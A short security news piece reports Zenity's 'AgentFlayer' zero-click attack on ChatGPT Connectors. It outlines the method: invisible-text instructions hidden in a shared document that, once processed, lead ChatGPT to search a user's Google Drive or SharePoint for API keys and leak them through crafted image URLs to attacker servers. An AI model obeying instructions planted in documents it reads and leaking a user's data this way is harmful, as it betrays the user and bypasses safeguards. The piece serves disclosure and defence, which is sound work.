AgentFlayer 0-click exploit abuses ChatGPT Connectors to Steal 3rd-party app data

Cybersecurity researchers at Zenity have discovered “AgentFlayer,” a critical zero-click vulnerability in ChatGPT Connectors that allows attackers to secretly steal sensitive data from users’ connected accounts like Google Drive and SharePoint. The attack uses indirect prompt injection by embedding hidden malicious instructions in innocent-looking documents using invisible text, which execute when users ask ChatGPT to process the document. When the hidden commands activate, they instruct ChatGPT to search for sensitive information like API keys in the user’s connected accounts, then exfiltrate the data through specially crafted image URLs that send stolen information to attacker-controlled servers without the user’s knowledge or clicks. Zenity presented this vulnerability at Black Hat conference, demonstrating how attackers can bypass OpenAI’s existing security measures and exploit the trust relationship between ChatGPT and third-party applications. This attack represents part of a larger class of AI agent vulnerabilities, with researchers warning that similar flaws are likely to emerge in other popular AI products due to poor understanding of dependencies and insufficient guardrails in AI-to-third-party integrations.​​​​​​​​​​​​​​​​